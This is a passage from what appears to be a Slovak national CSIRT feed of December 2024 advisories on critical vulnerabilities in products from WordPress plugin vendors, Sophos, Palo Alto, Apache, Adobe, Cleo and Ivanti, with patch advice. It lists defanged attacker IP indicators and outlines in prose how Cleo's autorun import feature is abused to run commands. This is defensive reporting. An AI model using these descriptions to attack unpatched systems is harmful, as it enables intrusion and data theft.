Pokiaľ pri vývoji webovej aplikácie v Python využívate knižnicu libarchive a používate metódu extract alebo extractall s použitím súboru ZIP, ktorý poskytol požívateľ, odporúčame zvážiť zmenu používanej knižnice na modernejšie alternatívy ako napríklad pyzipper.

Odkazy:

https://nvd.nist.gov/vuln/detail/CVE-2024-55587

Kritické zraniteľnosti v moduloch WordPress WPLMS a VibeBP

Marian Danko — Tue, 31 Dec 2024 12:57:42 +0000

Vývojári modulov WordPress WPLMS a VibeBP vydali bezpečnostné aktualizácie, ktoré opravujú 18 zraniteľností, z ktorých 7 je označených ako kritických. Kritické zraniteľnosti vo WPLMS možno zneužiť na nahranie súborov na server, vzdialené vykonanie kódu, eskaláciu privilégií a získanie úplnej kontroly nad systémom. Kritické zraniteľnosti vo VibeBP možno zneužiť na realizáciu SQL injekcie, eskaláciu privilégií z získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

WordPress plugin WPLMS vo verziách starších ako 1.9.9.5.3
WordPress plugin VibeBP vo verziách starších ako 1.9.9.7.7

Opis zraniteľnosti:

WPLMS:

CVE-2024-56046 (CVSS skóre 10,0), CVE-2024-56050, CVE-2024-56052 (CVSS skóre 9,9)

Bližšie nešpecifikované zraniteľnosti by vzdialený neautentifikovaný (CVE-2024-56046) či autentifikovaný útočník mohol zneužiť na nahranie ľubovoľných súborov na server, vykonanie škodlivého kódu a získanie úplnej kontroly nad systémom.

CVE-2024-56043 (CVSS skóre 9,8)

Kritickú zraniteľnosť by vzdialený neautentifikovaný používateľ mohol zneužiť na eskaláciu privilégií a získanie úplnej kontroly nad systémom.

CVE-2024-56042 (CVSS skóre 9,3)

Zraniteľnosť umožňuje prostredníctvom SQL injekcie získať neoprávnený prístup do databázy redakčného systému, získanie citlivých údajov a vykonanie neoprávnených zmien v systéme.

VibeBP:

CVE-2024-56040 (CVSS skóre 9,8)

Kritickú zraniteľnosť by vzdialený neautentifikovaný používateľ mohol zneužiť na eskaláciu privilégií a získanie úplnej kontroly nad systémom.

CVE-2024-56039 (CVSS skóre 9,3)

CVE-2024-56039 spočíva v nedostatočnom overovaní používateľských vstupov a možno ju prostredníctvom SQL injekcie zneužiť na získanie neoprávneného prístupu do databázy, získanie citlivých údajov a vykonanie neoprávnených zmien v systéme.

Možné škody:

Neoprávnený prístup do systému
Eskalácia privilégií
Neoprávnená zmena v systéme
Vzdialené vykonanie kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Bezodkladná aktualizácie zásuvného modulu WPLMS na verziu 1.9.9.5.3 a VibeBP na verziu 1.9.9.7.7.

Zdroje:

Kritické zraniteľnosti vo firewalloch Sophos

Marian Danko — Tue, 31 Dec 2024 12:53:46 +0000

Spoločnosť Sophos vydala bezpečnostné aktualizácie pre svoje firewally, ktoré opravujú tri zraniteľnosti, z ktorých dve sú označení ako kritické. CVE-2024-12727 a CVE-2024-12728 možno zneužiť na získanie neoprávneného prístupu do systému a vzdialené vykonanie kódu. Poslednú zraniteľnosť možno zneužiť na injekciu príkazov.

Zraniteľné systémy:

Sophos Firewall vo verziách 21.0 GA (21.0.0) a starších

Pozn.: Zraniteľnosti sú automaticky opravené na zariadeniach s aktivovanou funkciou pre automatickú inštaláciu bezpečnostných záplat (Allow automatic installation of hotfixes).

Opis zraniteľnosti:

CVE-2024-12727 (CVSS skóre 9,8)

CVE-2024-12727 vo funkcionalite pre ochranu e-mailov by vzdialený neautentifikovaný útočník prostredníctvom SQL injekcie mohol zneužiť na získanie neoprávneného prístupu k internej databáze firewallu a následne na vzdialené vykonanie kódu.

Zraniteľnosť je možné zneužiť na firewalloch bežiacich v režime HA (High Availability), na ktorých je aktivovaná funkcia SPX (Secure PDF eXchange).

CVE-2024-12728 (CVSS skóre 9,8)

Kritická zraniteľnosť spočíva v chybnom mechanizme pre generovanie SSH hesla používaného pri inicializácii zapojenia firewallu do HA (High Availability) klastra, ktoré zostáva aktívne aj po dokončení inicializačného procesu a možno ho zneužiť na získanie neoprávneného prístupu do systému.

CVE-2024-12729 (CVSS skóre 8,8)

CVE-2024-12729 v komponente User Portal by vzdialený autentifikovaný útočník mohol zneužiť na injekciu príkazov a vzdialené vykonanie kódu.

Možné škody:

Neoprávnený prístup do systému
Neoprávnený prístup k citlivým údajom
Neoprávnená zmena v systéme
Vzdialené vykonanie kódu

Odporúčania:

Zraniteľnosti sú automaticky opravené na firewalloch s aktivovanou funkciou pre automatickú inštaláciu bezpečnostných záplat (Allow automatic installation of hotfixes). Administrátori môžu úspešnú inštaláciu hotfixov overiť prostredníctvom postupu uvedeného na stránke spoločnosti Sophos.

Zdroje:

Aktívne zneužívaná zraniteľnosť v operačnom systéme Palo Alto PAN-OS

Marian Danko — Tue, 31 Dec 2024 12:50:50 +0000

Spoločnosť Palo Alto Networks vydala bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť v operačnom systéme PAN-OS. CVE-2024-3393 v komponente DNS Security možno zaslaním špeciálne vytvorených paketov zneužiť na zneprístupnenie služby a vyradenie firewallov. Zraniteľnosť súčasnosti aktívne zneužívajú útočníci.

Zraniteľné systémy:

PAN-OS 11.2 vo verziách starších ako 11.2.3
PAN-OS 11.1 vo verziách starších ako 11.1.5
PAN-OS 10.2 vo verziách od 10.2.8 až po verzie staršie ako 10.2.14
PAN-OS 10.1 vo verziách od 10.1.14 až po verzie staršie ako 10.1.15
Prisma Access s PAN-OS vo verziách od 10.2.8 (vrátane)
Prisma Access s PAN-OS vo verziách starších ako 11.2.3

Pozn.:

Zraniteľnosť je možné zneužiť len na zariadeniach so zraniteľnými verziami PAN-OS, na ktorých sú súčasne aktivované funkcie „DNS Security Logging“ a jedna z funkcií „DNS Security License“ alebo „Advanced DNS Security License“
Cloud NGFW a zariadenia s PAN-OS 9.1 nie sú predmetnou zraniteľnosťou zasiahnuté

Opis zraniteľnosti:

CVE-2024-3393 (CVSS skóre 8,7)

Vysoko závažnú zraniteľnosť v komponente DNS Security by vzdialený neautentifikovaný útočník zaslaním špeciálne vytvorených DNS paketov mohol zneužiť na vyvolanie reštartu zariadenia. Pri jej opakovanom zneužití dochádza k prepnutiu zariadenia do „maintenance“ režimu a úplnému zneprístupneniu služby. Zraniteľnosť je v súčasnosti aktívne zneužívaná.

Možné škody:

Zneprístupnenie služby (DoS)

Odporúčania:

Spoločnosť Palo Alto odporúča používať len produkty s platnou technickou podporou a bezodkladnú aktualizáciu zasiahnutých systémov aspoň na verzie PAN-OS 10.1.15, PAN-OS 10.2.14, PAN-OS 11.1.5, PAN-OS 11.2.3, resp ďalšie podverzie v zozname na stránke výrobcu v časti „Solution“.

Na systémoch, kde aktualizácia nie je možná, zraniteľnosť možno mitigovať úpravou konfigurácie DNS Security. Kompletný návod môžete nájsť na stránke výrobcu v časti „Workarounds and Mitigations“.

Zdroje:

Kritické zraniteľnosti v produktoch Apache MINA, HugeGraph-Server a Traffic Control

Marian Danko — Tue, 31 Dec 2024 12:49:51 +0000

Vývojári z The Apache Software Foundation vydali bezpečnostné aktualizácie, ktoré opravujú kritické zraniteľnosti v produktoch Apache MINA, Apache HugeGraph-Server a Apache Traffic Control. CVE-2024-52046 v sieťovom aplikačnom frameworku MINA možno zneužiť na vzdialené vykonanie škodlivého kódu. CVE-2024-43441 v Apache HugeGraph-Server umožňuje získanie úplnej kontroly nad systémom a CVE-2024-45387 (Traffic Control) možno zneužiť na realizáciu SQL injekcie.

Zraniteľné systémy:

Apache MINA 2.0.X vo verziách starších ako 2.0.27
Apache MINA 2.1.X vo verziách starších ako 2.1.10
Apache MINA 2.2.X vo verziách starších ako 2.2.4
Apache HugeGraph-Server vo verziách 1.0.X starších ako 1.5.0
Apache Traffic Control vo verziách 8.0.X starších ako 8.0.2

Opis zraniteľnosti:

Apache MINA:

CVE-2024-52046 (CVSS 4.0 skóre 10,0)

CVE-2024-52046 v sieťovom aplikačnom frameworku MINA spočíva v nezabezpečenej, resp. neošetrenej deserializácii objektov Java v rámci funkcie ObjectSerializationDecoder a možno ju zneužiť na vzdialené vykonanie škodlivého kódu.

Apache HugeGraph-Server:

CVE-2024-43441 (CVSS skóre 9,8)

Apache HugeGraph-Server obsahuje zraniteľnosť s označením CVE-2024-43441, ktorú možno zneužiť na obídenie mechanizmov autentifikácie a získanie úplnej kontroly nad systémom.

Apache Traffic Control:

CVE-2024-45387 (CVSS skóre 9,9)

Traffic Ops obsahuje zraniteľnosť, ktorú by vzdialený autentifikovaný útočník s opráveniami úrovne „admin“, „federation“, „operations“, „portal“ alebo „steering“ mohol zaslaním špeciálne vytvorených požiadaviek HTTP PUT zneužiť na realizáciu SQL injekcie s následkom úplného narušenie dôvernosti, integrity a dostupnosti systému.

Možné škody:

Obídenie mechanizmov autentifikácie
Vzdialené vykonanie kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Bezodkladná aktualizácia Apache MINA, Apache HugeGraph-Server a Apache Traffic Control na verzie špecifikované v časti „Zraniteľné systémy“ tohto varovania.

Zdroje:

Kritická zraniteľnosť v produktoch Adobe ColdFusion

Marian Danko — Tue, 31 Dec 2024 12:44:34 +0000

Spoločnosť Adobe vydala bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť v produkte Adobe ColdFusion. CVE-2024-53961 možno zneužiť na získanie neoprávneného prístupu k citlivým údajom, ktoré možno následne zneužiť na realizáciu ďalších útokov a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

Adobe ColdFusion 2023 vo verziách starších ako Update 12
Adobe ColdFusion 2021 vo verziách starších ako Update 18

Opis zraniteľnosti:

CVE-2024-53961 (CVSS skóre 7,4)

Kritickú zraniteľnosť by vzdialený neautentifikovaný útočník mohol zneužiť na čítanie obsahu ľubovoľných súborov na súborovom systéme zraniteľných serverov, čím môže získať neoprávnený prístup k citlivým údajom.Na zraniteľnosť je v súčasnosti dostupný aj proof-of-concept kód demonštrujúci postup pre jej zneužitie a možno očakávať pokusy o jej aktívne zneužívanie.

Možné škody:

Neoprávnený prístup k citlivým údajom

Odporúčania:

Odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov na verzie Adobe ColdFusion 2023 Update 12 a Adobe ColdFusion 2021 Update 18.

Adobe zároveň odporúča aplikovať konfiguráciu podľa svojich návodov pre ColdFusion 2023 a ColdFusion 2021.

Zdroje:

Kritická zraniteľnosť vo webových serveroch Apache Tomcat

Marian Danko — Fri, 20 Dec 2024 14:26:21 +0000

Vývojári open-source webového servera Apache Tomcat vydali bezpečnostné aktualizácie opravujúce 2 zraniteľnosti, z ktorých jedna je označená ako kritická. CVE-2024-50379 by vzdialený neautentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu.

Zraniteľné systémy:

Apache Tomcat 11.0.X vo verziách starších ako 11.0.2
Apache Tomcat 10.1.X vo verziách starších ako 10.1.34
Apache Tomcat 9.0.X vo verziách starších ako 9.0.98

Opis zraniteľnosti:

CVE-2024-50379 (CVSS skóre 9,8)

Kritická zraniteľnosť spočíva v TOCTOU (Time-of-Check Time-of-Use) súbehu procesov počas JSP kompilácie. CVE-2024-50379 by vzdialený neautentifikovaný útočník nahraním špeciálne vytvorených súborov mohol zneužiť na vzdialené vykonanie kódu a úplné narušenie dôvernosti, integrity a dostupnosti systému.

Zraniteľnosť je možné zneužiť len na súborových systémoch nerozlišujúcich malé a veľké písmená v názvoch súborov (tzv. case insensitive file systems), pokiaľ je v Default servlete parameter pre zákaz zápisu nastavený na hodnotu False, teda kde je povolený zápis.

CVE-2024-54677 (CVSS skóre 5,3)

Zraniteľnosť vo vzorových webových aplikáciách obsiahnutých v rámci inštalácií Apache Tomcat spočívajú v absencii limitov pre celkovú veľkosť nahrávaných súborov. Vzdialený neautentifikovaný útočník by ich mohol zneužiť na zahltenie pamäte a zneprístupnenie služby.

Možné škody:

Vzdialené vykonanie kódu
Nedostupnosť služby (DoS)

Odporúčania:

Odporúčame vykonať bezodkladnú aktualizáciu zraniteľných inštancií Apache Tomcat aspoň na verzie

Apache Tomcat 11.0.2
Apache Tomcat 10.1.34
Apache Tomcat 9.0.98

Zdroje:

Aktívne zneužívaná kritická zraniteľnosť vo frameworku Apache Struts

Marian Danko — Fri, 20 Dec 2024 14:22:15 +0000

Vývojári open-source frameworku pre tvorbu Java EE webových aplikácií Apache Struts vydali bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú kritickú zraniteľnosť. CVE-2024-53677 možno zneužiť na upload súborov a vzdialené vykonanie kódu. Na uvedenú zraniteľnosť je v súčasnosti dostupný proof-of-concept kód demonštrujúci postup jej zneužitia.

Zraniteľné systémy:

Apache Struts vo verziách 2.0.0 až 2.3.37 (ukončená technická podpora)
Apache Struts vo verziách 2.5.0 až 2.5.33 (ukončená technická podpora)
Apache Struts vo verziách 6.0.0 až 6.3.0.2

Pozn.: Zraniteľnosť je možné zneužiť len v rámci aplikácií, ktoré využívajú FileUploadInterceptor

Opis zraniteľnosti:

CVE-2024-53677 (CVSS 4.0 skóre 9,5)

Bližšie nešpecifikovanú chybu v logike pre nahrávanie súborov by vzdialený neautentifikovaný útočník zaslaním špeciálne vytvorených POST požiadaviek mohol zneužiť na nahratie škodlivých súborov a vzdialené vykonanie kódu. CVE-2024-53677 je v súčasnosti aktívne zneužívaná útočníkmi a je dostupný proof-of-concept kód demonštrujúci postup jej zneužitia.

Možné škody:

Vzdialené vykonanie kódu
Neoprávnená zmena v systéme

Indikátory kompromitácie:

169.150.226[.]162

Odporúčania:

Výrobca odporúča bezodkladnú aktualizáciu Apache Struts na verziu 6.4.0 alebo novšiu. Odstránenie zraniteľnosti okrem samotnej aktualizácie frameworku vyžaduje aj úpravu zdrojového kódu aplikácií, aby začali využívať nový mechanizmus pre nahrávanie súborov.

Vzhľadom na aktívne zneužívanie zraniteľnosti odporúčame dôkladne preveriť prítomnosť dostupných indikátorov kompromitácie v logoch sieťových a bezpečnostných prvkov a ich blokovanie.

Zdroje:

Mesačná správa CSIRT.SK – november 2024

Marian Danko — Fri, 13 Dec 2024 10:11:17 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci november 2024. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

Mesačná správa – 11/2024 PDF (1 838 KB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás.

Kritické bezpečnostné zraniteľnosti v produktoch Adobe

Marian Danko — Thu, 12 Dec 2024 14:05:27 +0000

Spoločnosť Adobe vydala bezpečnostné aktualizácie svojich produktov Adobe Experience Manager, Acrobat, Reader, Media Encoder, Illustrator, After Effects, Animate, InDesign, PDFL Software Development Kit (SDK), Connect, Substance 3D Sampler, Photoshop, Substance 3D Modeler, Bridge, Premiere Pro, Substance 3D Painter a FrameMaker, ktoré opravujú 165 zraniteľností, z čoho 45 sú označené ako kritické. Kritické zraniteľnosti by vzdialený neautentifikovaný útočník prostredníctvom podvrhnutia špeciálne vytvorených súborov mohol zneužiť na vykonanie škodlivého kódu, eskaláciu privilégií a získanie neoprávneného prístupu k citlivým údajom. Ostatné zraniteľnosti umožňujú vykonanie škodlivého kódu, získanie neoprávneného prístupu k citlivým údajom, obídenie bezpečnostných prvkov a zneprístupnenie služby.

Zraniteľné systémy:

Adobe Experience Manager (AEM) vo verziách starších ako AEM Cloud Service Release 2024.11
Adobe Experience Manager (AEM) vo verziách starších ako 6.5.22
Acrobat DC vo verziách starších ako 24.005.20320
Acrobat Reader DC vo verziách starších ako 24.005.20320
Acrobat 2024 vo verziách starších ako 24.001.30225
Acrobat 2020 vo verziách starších ako 20.005.30748
Acrobat Reader 2020 vo verziách starších ako 20.005.30748
Adobe Media Encoder vo verziách starších ako 24.6.4
Adobe Media Encoder vo verziách starších ako 25.1
Illustrator 2025 vo verziách starších ako 29.1
Illustrator 2024 vo verziách starších ako 28.7.3
Adobe After Effects vo verziách starších ako 24.6.3
Adobe After Effects vo verziách starších ako 25.1
Adobe Animate  2023 vo verziách starších ako 23.0.9
Adobe Animate  2024 vo verziách starších ako 24.0.6
Adobe InDesign vo verziách starších ako ID20.0
Adobe InDesign vo verziách starších ako ID19.5.1
Adobe PDFL Software Development Kit (SDK) vo verziách starších ako 21.0.0.7
Adobe Connect vo verziách starších ako 12.7
Adobe Connect vo verziách starších ako 11.4.9
Adobe Substance 3D Sampler vo verziách starších ako 4.5.2
Photoshop 2025 vo verziách starších ako 26.1
Adobe Substance 3D Modeler vo verziách starších ako 1.15.0
Adobe Bridge vo verziách starších ako 14.1.4
Adobe Bridge vo verziách starších ako 15.0.1
Adobe Premiere Pro vo verziách starších ako 25.1
Adobe Premiere Pro vo verziách starších ako 24.6.4
Adobe Substance 3D Painter vo verziách starších ako 10.1.2
Adobe FrameMaker 2020 vo verziách starších ako Release Update 7 bez aktualizácie DLL
Adobe FrameMaker 2022 vo verziách starších ako Release Update 5 bez aktualizácie DLL

Opis zraniteľnosti:

Adobe Experience Manager:

CVE-2024-43711 (CVSS skóre 7,1)

Kritická zraniteľnosť spočíva v nedostatočnom overovaní vstupov a vzdialený útočník by ju mohol zneužiť na vzdialené vykonanie kódu.

Adobe Acrobat, Adobe Reader:

CVE-2024-49530 (CVSS skóre 7,8), CVE-2024-49535 (CVSS skóre 6,3)

Zraniteľnosti spočívajúce v použití odalokovaného miesta v pamäti (CVE-2024-49530) a nesprávnej reštrikcii XML External Entity referencií (CVE-2024-49535) možno zneužiť na vykonanie škodlivého kódu.

Adobe Media Encoder:

CVE-2024-49551, CVE-2024-49552, CVE-2024-49553 (CVSS skóre 7,8)

Zápis mimo povolených hodnôt (CVE-2024-49551, CVE-2024-49553) a pretečenie medzipamäte haldy (CVE-2024-49552) v rámci produktu Adobe Media Encoder umožňujú vykonanie škodlivého kódu.

Adobe Illustrator:

CVE-2024-49538, CVE-2024-49541 (CVSS skóre 7,8)

Uvedené zraniteľnosti spočívajú v zápise do pamäte mimo povodených hodnôt a umožňujú vykonanie škodlivého kódu.

Adobe After Effects:

CVE-2024-49537 (CVSS skóre 7,8)

Pretečenie vyrovnávacej pamäte zásobníka možno zneužiť na získanie neoprávneného prístupu k obsahu pamäte a úplné narušenie dôvernosti, integrity a dostupnosti systému.

Adobe Animate:

CVE-2024-52982, CVE-2024-52983, CVE-2024-52984, CVE-2024-52985, CVE-2024-52986, CVE-2024-52987, CVE-2024-52988, CVE-2024-52989, CVE-2024-52990, CVE-2024-45155, CVE-2024-45156, CVE-2024-53953, CVE-2024-53954 (CVSS skóre 7,8)

Kritické zraniteľnosti umožňujúce vykonanie škodlivého kódu spočívajú v nesprávnom overovaní vstupov (CVE-2024-52982), pretečení celočíselnej premennej (CVE-2024-52983), podtečení celočíselnej premennej (CVE-2024-52984, CVE-2024-52985, CVE-2024-52986, CVE-2024-52987, CVE-2024-52989, CVE-2024-53954), zápise do pamäte mimo povolených hodnôt (CVE-2024-52988), podtečení zásobníka (CVE-2024-52990), prístupe k neinicializovanému pointeru (CVE-2024-45155), dereferencii nulového ukazovateľa (CVE-2024-45156) a použití odalokovaného miesta v pamäti (CVE-2024-53953).

Adobe InDesign:

CVE-2024-49543, CVE-2024-49545 (CVSS skóre 7,8)

Pretečenie vyrovnávacej pamäte zásobníka a pretečenie medzipamäte haldy v rámci Adobe InDesign možno zneužiť na vykonanie škodlivého kódu.

CVE-2024-49544 (CVSS skóre 7,8)

Zápis do pamäte mimo povolených hodnôt možno zneužiť na získanie neoprávneného prístupu k obsahu pamäte a úplné narušenie dôvernosti, integrity a dostupnosti systému.

Adobe PDFL Software Development Kit (SDK):

CVE-2024-49513 (CVSS skóre 7,8)

Kritickú zraniteľnosť v Adobe PDFL SDK možno zneužiť na vykonanie škodlivého kódu. Zraniteľnosť spočíva v zápise mimo povolených hodnôt pamäte.

Adobe Connect:

CVE-2024-54032, CVE-2024-54036 (CVSS skóre 9,3), CVE-2024-54034 (CVSS skóre 8,0) a CVE-2024-54037 (CVSS skóre 7,3)

Bližšie nešpecifikované kritické zraniteľnosti v Adobe Connect by vzdialený útočník mohol zneužiť na realizáciu útokov tzv. Reflected XSS (Cross Site Scripting).

CVE-2024-54035 (CVSS skóre 7,3)

Zraniteľnosť spočívajúcu v nesprávnej autorizácii by vzdialený neautentifikovaný útočník mohol zneužiť na eskaláciu privilégií. Zneužitie zraniteľnosti nevyžaduje interakciu zo strany používateľa.

Adobe  Substance 3D Sampler:

CVE-2024-52994, CVE-2024-52995, CVE-2024-52996 (CVSS skóre 7,8)

Zápis do pamäte mimo povolených hodnôt (CVE-2024-52994) a pretečenie medzipamäte haldy (ostatné) možno zneužiť na vykonanie kódu.

Adobe Photoshop:

CVE-2024-52997 (CVSS skóre 7,8)

Zraniteľnosť, ktorá spočíva v použití odalokovaného miesta v pamäti, umožňuje vykonanie kódu.

Adobe Substance 3D Modeler:

CVE-2024-52999, CVE-2024-53000, CVE-2024-53001, CVE-2024-53002, CVE-2024-53003 (CVSS skóre 7,8)

Produkt Adobe Substance 3D Modeler obsahuje zraniteľnosti, ktoré možno zneužiť na vykonanie kódu. Zraniteľnosť s identifikátorom CVE-2024-52999 spočíva v pretečení medzipamäte haldy a ostatné zraniteľnosti v zápise do pamäte mimo povolených hodnôt.

Adobe Bridge:

CVE-2024-53955 (CVSS skóre 7,8)

Kritická zraniteľnosť s označením CVE-2024-53955 umožňuje zneužitie podtečenia celočíselnej premennej na vykonanie kódu.

Adobe Premiere Pro:

CVE-2024-53956 (CVSS skóre 7,8)

Produkt Adobe Premiere Pro obsahuje zraniteľnosť, ktorá umožňuje vykonanie kódu.

Adobe Substance 3D Painter:

CVE-2024-53957, CVE-2024-53958 (CVSS skóre 7,8)

Zápis do pamäte mimo povolených hodnôt (CVE-2024-53958) a pretečenie medzipamäte haldy (CVE-2024-53957) v Adobe Substance 3D Painter taktiež možno zneužiť na vykonanie kódu.

Adobe FrameMaker:

CVE-2024-53959 (CVSS skóre 7,8)

Kritickej zraniteľnosti bol pridelený identifikátor CVE-2024-53959 a možno ju zneužiť na vykonanie kódu.

Zneužitie vyššie uvedených zraniteľností (ak nie je uvedené inak) vyžaduje interakciu zo strany používateľa, ktorý musí stiahnuť a otvoriť špeciálne vytvorené súbory.

Možné škody:

Vykonanie škodlivého kódu
Eskalácia privilégií
Neoprávnený prístup k citlivým údajom
Obídenie bezpečnostných prvkov
Zneprístupnenie služby

Odporúčania:

Odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov na verzie špecifikované v časti Zraniteľné systémy alebo na webových stránkach výrobcu uvedených v časti Zdroje.

Zdroje:

Aktívne zneužívaná zraniteľnosť v nástrojoch pre zabezpečený prenos súborov od spoločnosti Cleo

Marian Danko — Thu, 12 Dec 2024 13:51:20 +0000

Bezpečnostní výskumníci zo spoločnosti Huntress informovali o aktívne zneužívanej zraniteľnosti v nástrojoch pre zabezpečený prenos a zdieľanie súborov Cleo Harmony, Cleo VLTrader a Cleo LexiCom. Zraniteľnosť CVE-2024-55956 možno zneužiť na získanie neoprávneného prístupu k citlivým údajom, vykonanie neoprávnených zmien v systéme a vzdialené vykonanie kódu. Zraniteľnosť v súčasnosti zneužíva aj ransomvérová skupina Clop.

[Aktualizované 17.12.2024]

Zraniteľné systémy:

Cleo Harmony vo verziách starších ako 5.8.0.24
Cleo VLTrader vo verziách starších ako 5.8.0.24
Cleo LexiCom vo verziách starších ako 5.8.0.24

Opis zraniteľnosti:

CVE-2024-55956 (CVSS skóre 9,8)

Jedná sa o zraniteľnosť podobnú staršej CVE-2024-50623, ktorá bola odstránená v rámci aktualizácií vydaných v októbri 2024. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na nahratie ľubovoľných súborov a vykonanie príkazov na hostiteľskom systéme.

Súbory umiestnené v priečinku autorun v koreňovom adresári aplikácií LexiCom, Harmony a VLTrader sú automaticky interpretované. Nahraním špeciálne vytvorených súborov zneužívajúcich zabudovanú funkcionalitu produktov Import možno dosiahnuť vzdialené vykonanie príkazov Bash alebo PowerShell definovaných v ďalších súboroch, ktoré nahral útočník.

V súčasnosti je dostupný Proof of Concept (PoC) demonštrujúci mechanizmus zneužitia zraniteľnosti.

Zraniteľnosť aktívne zneužívajú útočníci minimálne od 3. decembra 2024. Ransomvérová skupina CLOP ju v rámci útokov zneužíva na krádež citlivých údajov.

Možné škody:

Neoprávnená zmena v systéme
Neoprávnený prístup k citlivým údajom
Vzdialené vykonanie kódu

Indikátory kompromitácie (IoC):

5.149.249[.]226
89.248.172[.]139
176.123.10[.]115
176.123.5[.]126
181.214.147[.]164
185.162.128[.]133
185.163.204[.]137
185.181.230[.]103
192.119.99[.]42
209.127.12[.]38

Odporúčania:

Bezodkladná aktualizácia Cleo Harmony, VLTrader a LexiCom aspoň na verziu 5.8.0.24.

Mitigovať zraniteľnosť je možné limitovaním prístupu k zraniteľným systémom prostredníctvom sieťových a bezpečnostných prvkov. Spusteniu kódu z priečinka autoruns možno zabrániť zmenou konfigurácie zraniteľných aplikácií podľa odporúčaní výskumníkov v časti How to Stay Protected.

Vzhľadom na aktívne zneužívanie zraniteľnosti odporúčame dôkladne preveriť prítomnosť dostupných indikátorov kompromitácie v logoch sieťových a bezpečnostných prvkov.

Pokusy o zneužitie zraniteľnosti možno identifikovať analýzou logov aplikácií v priečinku logs. Taktiež odporúčame vykonať inšpekciu obsahu priečinkov autorun na prítomnosť podozrivých .TXT súborov a obsah host na prítomnosť podozrivých .XML súborov obsahujúcich príkazy Bash alebo PowerShell. K dispozícii sú aj Sigma pravidlá pre host-based detekciu [1, 2].

Zdroje:

Kritické bezpečnostné zraniteľnosti v produktoch Ivanti CSA, ICS a IPS

Marian Danko — Thu, 12 Dec 2024 12:34:47 +0000

Spoločnosť Ivanti vydala bezpečnostné aktualizácie, ktoré opravujú 8 bezpečnostných zraniteľností v produktoch Ivanti Cloud Services Application (CSA), Ivanti Desktop and Server Management (DSM), Ivanti Connect Secure (ICS), Ivanti Policy Secure (IPS), Sentry a Patch SDK, z čoho 5 je označených ako kritické. Kritické zraniteľnosti v produktoch CSA, ICS a IPS možno zneužiť na SQL injekciu, vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom. Ostatné zraniteľnosti možno zneužiť na zneprístupnenie služby, vykonanie neoprávnených zmien v systéme a obídenie bezpečnostných mechanizmov.

Zraniteľné systémy:

Ivanti Cloud Services Application vo verziách starších ako 5.0.3
Ivanti Desktop and Server Management vo verziách starších ako 2024.3.5740
Ivanti Connect Secure vo verziách starších ako 22.7R2.4
Ivanti Policy Secure vo verziách starších ako 22.7R1.2
Ivanti Sentry 9.20.X vo verziách starších ako 9.20.2
Ivanti Sentry 10.0.X vo verziách starších ako 10. 0.2
Ivanti Patch SDK vo verziách starších ako 9.7.703

Pozn.: Zraniteľné verzie Ivanti Patch SDK sú používané v nasledujúcich produktoch:

Ivanti Endpoint Manager 2022 SU6 bez bezpečnostných záplat z novembra 2024
Ivanti Endpoint Manager 2024 bez bezpečnostných záplat z novembra 2024
Ivanti Security Controls (iSec) vo verziách starších ako 2024.4 (9.6.9375.0)
Ivanti Patch for Configuration Manager vo verziách starších ako 2024.4 (2.5.1129.0)
Ivanti Neurons for Patch Management vo verziách starších ako 2024.4 (1.1.67.0)
Ivanti Neurons Agent Platform vo verziách starších ako 2024.4 (9.6.839)

Opis zraniteľnosti:

Ivanti Cloud Services Application (CSA):

CVE-2024-11639 (CVSS skóre 10,0)

Najzávažnejšia zraniteľnosť spočíva v nedostatočnej implementácie mechanizmov autentifikácie a vzdialený neautentifikovaný útočník by ju mohol zneužiť na získanie administrátorského prístupu do systému.

CVE-2024-11772, CVE-2024-11773 (CVSS skóre 9,1)

Kritické zraniteľnosti vo webovej administrátorskej konzole by vzdialený autentifikovaný útočník s oprávneniami administrátora mohol zneužiť na realizáciu SQL injekcie (CVE-2024-11773) a vzdialené vykonanie kódu (CVE-2024-11772).

Ivanti Connect Secure (ICS), Ivanti Policy Secure (IPS):

CVE-2024-11633, CVE-2024-11634 (CVSS skóre 9,1)

Bližšie nešpecifikované kritické zraniteľnosti by vzdialený autentifikovaný útočník s oprávneniami administrátora prostredníctvom injekcie argumentov (CVE-2024-11633) a injekcie príkazov (CVE-2024-11634) mohol zneužiť na vzdialené vykonanie kódu.

Ostatné vysoko závažné zraniteľnosti v ICS a IPS umožňujú zneprístupnenie služby (CVE-2024-37377, CVE-2024-37401) a obídenie bezpečnostných mechanizmov (CVE-2024-9844).

Ivanti Desktop and Server Management (DSM):

CVE-2024-7572 (CVSS skóre 7,1)

Vysoko závažná zraniteľnosť spočíva v nesprávnom nastavení oprávnení a lokálny autentifikovaný útočník by ju mohol zneužiť na zmazanie súborov na súborovom systéme, ktoré môže mať za následok úplné narušenie integrity a dostupnosti zraniteľných systémov.

Ivanti Sentry:

CVE-2024-8540 (CVSS skóre 8,8)

Nesprávne nastavenie oprávnení by lokálny autentifikovaný útočník mohol zneužiť na vykonanie neoprávnených zmien kritických komponentov aplikácie a získanie úplnej kontroly nad systémom.

Ivanti Patch SDK:

CVE-2024-10256 (CVSS skóre 7,1)

Zraniteľnosť v Patch SDK umožňuje lokálnemu autentifikovanému útočníkov zmazať súbory na súborovom systéme a spôsobiť tým úplné narušenie integrity a dostupnosti zraniteľných systémov. Nakoľko je Ivanti Patch SDK využívané aj v rámci produktov Ivanti Endpoint Manager, Ivanti Security Controls (iSec), Ivanti Patch for Configuration Manager a Ivanti Neurons Agent Platform, zraniteľné sú všetky verzie týchto produktov využívajúce zraniteľné SDK. Presný zoznam zraniteľných verzií môžete nájsť vyššie v časti Zraniteľné systémy alebo na stránke výrobcu.

Možné škody:

Vzdialené vykonanie kódu
Neoprávnená zmena v systéme
Zneprístupnenie služby
